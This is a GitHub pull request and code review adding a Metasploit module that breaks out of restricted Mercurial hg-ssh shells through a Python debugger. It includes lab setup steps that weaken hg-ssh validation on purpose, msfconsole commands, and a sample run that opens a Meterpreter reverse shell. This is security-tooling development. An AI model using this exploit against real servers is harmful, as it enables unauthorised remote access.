### PR TITLE
Add mercurial ssh exec

### PR DESCRIPTION
**Pull request by claudijd**
This module allows a remote user with SSH access to an HG repository with a weak hg-ssh repo validation wrapper to break out of their restricted shell by tricking the HG binary to offering up a Python debugger session.

Reference: https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29

## Verification

List the steps needed to make sure this thing works

Setup a Target HG Service w/ weak repo validation
- [x] Install mercurial on your test server
- [x] Patch the hg-ssh Python script script to emulate custom/weak repo validation in hg-ssh wrapper `vi $(which hg-ssh)`
        Replace "if repo in allowed paths:" with "if True:"
        Replace "cmd = ['-R', repo, 'serve', 'stdio']" with "cmd = ['-R', path, 'serve', 'stdio']"
- [x] Setup a user with SSH pubkey auth
- [x] Create a test repo in the users home directory and add a commit
        mkdir -p repos/repo1
        cd repos/repo1
        echo "hello world" > README
        hg add README
        hg commit -m "Adds README"
- [x] Restrict user in authorized_keys to hg-ssh binary only
command="hg-ssh ~/repos/repo1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding INSERT_SSH_PUB_KEY
- [x] Verify SSH user can authenticate (should prompt and prevent a shell)
        ssh user@192.168.10.99
- [x] Verify SSH user commands are not allows (should prevent arbitrary commands)
ssh user@192.168.10.99 ifconfig

Setup MSF Client
- [x] Start `msfconsole`
- [x] `use exploit/linux/ssh/mercurial_ssh_exec`
- [x] `set RHOST 192.168.10.99`
- [x] `set USERNAME jsmith`
- [x] `set SSH_PRIV_KEY_FILE /Users/jsmith/.ssh/id_rsa`
- [x] `set LHOST 192.168.10.98`
- [x] `exploit`
- [x] **Verify** the thing does what it should
- [x] **Verify** the thing does not do what it should not
- [x] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

MSF Example Run

    msf exploit(mercurial_ssh_exec) > exploit

    [*] Started reverse TCP handler on 192.168.10.37:4444 
    [*] 192.168.10.99:22 - 192.168.10.99:22 - Attempting to login...
    [+] 192.168.10.99:22 - SSH connection is established.
    [+] 192.168.10.99:22 - Triggered Debugger (entering debugger - type c to continue starting hg or h for help)
    [*] Sending stage (39842 bytes) to 192.168.10.99
    [*] Meterpreter session 1 opened (192.168.10.37:4444 -> 192.168.10.99:57606) at 2017-04-18 19:16:44 -0400

### CODE REVIEW

**Comment by claudijd** [comment]
I'm in the process of writing up the docs now, but wanted to get the code up for review/feedback/etc.

File: modules/exploits/linux/ssh/mercurial_ssh_exec.rb [hunk 1]
```diff
@@ -0,0 +1,132 @@
...
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [ ['Automatic', {}] ],
+      'Privileged'     => false,
+      'DisclosureDate' => "April 18 2017",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        Opt::RHOST(""),
```
Comment (wvu-r7) [inline modules/exploits/linux/ssh/mercurial_ssh_exec.rb]: Wat.

File: modules/exploits/linux/ssh/mercurial_ssh_exec.rb [hunk 2]
```diff
@@ -0,0 +1,132 @@
...
+
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+  def rhost
```
Comment (wvu-r7) [inline modules/exploits/linux/ssh/mercurial_ssh_exec.rb]: `rhost` and `rport` should already be defined. Check me?

File: modules/exploits/linux/ssh/mercurial_ssh_exec.rb [hunk 3]
```diff
@@ -0,0 +1,132 @@
...
+      end
+
+      begin
+        ssh.loop unless session_created?
+      rescue Errno::EBADF => e
+        elog(e.message)
+      end
+    end
+  end
+
```
Comment (wvu-r7) [inline modules/exploits/linux/ssh/mercurial_ssh_exec.rb]: Extraneous newline? Doesn't match `class`.

File: modules/exploits/linux/ssh/mercurial_ssh_exec.rb [hunk 4]
```diff
@@ -0,0 +1,132 @@
...
+end
```
Comment (wvu-r7) [inline modules/exploits/linux/ssh/mercurial_ssh_exec.rb]: Please add an EOF newline?

**Comment by claudijd** [comment]
Also, reminder to self to clean up msftidy turds

File: modules/exploits/linux/ssh/mercurial_ssh_exec.rb (hunk 3 above)
Comment (claudijd) [inline modules/exploits/linux/ssh/mercurial_ssh_exec.rb]: Fixed in 32f0b570918ac60b793b1c4df028d9522b6418a7

File: modules/exploits/linux/ssh/mercurial_ssh_exec.rb (hunk 4 above)
Comment (claudijd) [inline modules/exploits/linux/ssh/mercurial_ssh_exec.rb]: Fixed in 32f0b570918ac60b793b1c4df028d9522b6418a7

File: modules/exploits/linux/ssh/mercurial_ssh_exec.rb (hunk 2 above)
Comment (claudijd) [inline modules/exploits/linux/ssh/mercurial_ssh_exec.rb]: This is provided by the Msf::Exploit::Remote::Tcp mix-in, which was not included (I will add it to this module)

FWIW, there are probably dozens of modules which could be simplified to eliminate this boilerplate code re-use that extend well beyond this PR.

Comment (claudijd) [inline modules/exploits/linux/ssh/mercurial_ssh_exec.rb]: Fixed in 9a870a623de814b0afbb3558c5e2249c6d665a1d

Comment (wvu-r7) [inline modules/exploits/linux/ssh/mercurial_ssh_exec.rb]: No, you're right. I'm used to it being available, but you didn't include any mixins that have it. Don't bother including `Msf::Exploit::Remote::Tcp` just to get `rhost` and `rport`. It's not worth pulling in more methods than you need.

Comment (claudijd) [inline modules/exploits/linux/ssh/mercurial_ssh_exec.rb]: Reverted in bfca4da9b080100f5c004c0e6e08d6967fe039bb

**Comment by claudijd** [comment]
Ok, initial round of review items addressed and documentation added.

File: documentation/modules/exploit/linux/ssh/mercurial_ssh_exec.md [hunk 5]
```diff
@@ -0,0 +1,53 @@
+## Vulnerable Application
+
+[mercurial](https://www.mercurial-scm.org/downloads).
+
+This module was successfully tested against:
+
+Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)
```
Comment (h00die) [inline documentation/modules/exploit/linux/ssh/mercurial_ssh_exec.md]: I would put this line in a list. Yes its a single item list, but thats how most other docs are done

**Comment by h00die** [comment]
one super minor doc change. docs look good to me!  Thanks for the detailed instructions on getting everything set up correctly

File: documentation/modules/exploit/linux/ssh/mercurial_ssh_exec.md (hunk 5 above)
Comment (claudijd) [inline documentation/modules/exploit/linux/ssh/mercurial_ssh_exec.md]: Fixed in 999a5dfb9c245c99e60c44b8e792d2669d56c8a5

**Comment by claudijd** [comment]
Thanks @h00die and @wvu-r7!

File: modules/exploits/linux/ssh/mercurial_ssh_exec.rb [hunk 6]
```diff
@@ -0,0 +1,131 @@
...
+      'DisclosureDate' => "Apr 18 2017",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        Opt::RHOST(),
+        Opt::RPORT(22),
+        OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
+        OptString.new('SSH_PRIV_KEY_FILE', [ true, 'The path to private key for ssh auth', '' ]),
```
Comment (wvu-r7) [inline modules/exploits/linux/ssh/mercurial_ssh_exec.rb]: This should be `OptPath`.

**Comment by wvu-r7** [comment]
https://github.com/rapid7/metasploit-framework/commit/f60807113ba3078de8cafdaf5ee7a5ffd67b29b6 :+1:

File: modules/exploits/linux/ssh/mercurial_ssh_exec.rb (hunk 1 above)
Comment (wvu-r7) [inline modules/exploits/linux/ssh/mercurial_ssh_exec.rb]: Note: this was necessary because the SSH mixin doesn't add it. :(

**Comment by claudijd** [comment]
@wvu-r7 thanks for the fix and merge!

**Comment by wvu-r7** [comment]
# Release Notes

This adds an exploit for the `hg-ssh` wrapper in Mercurial.

**Pull request merged**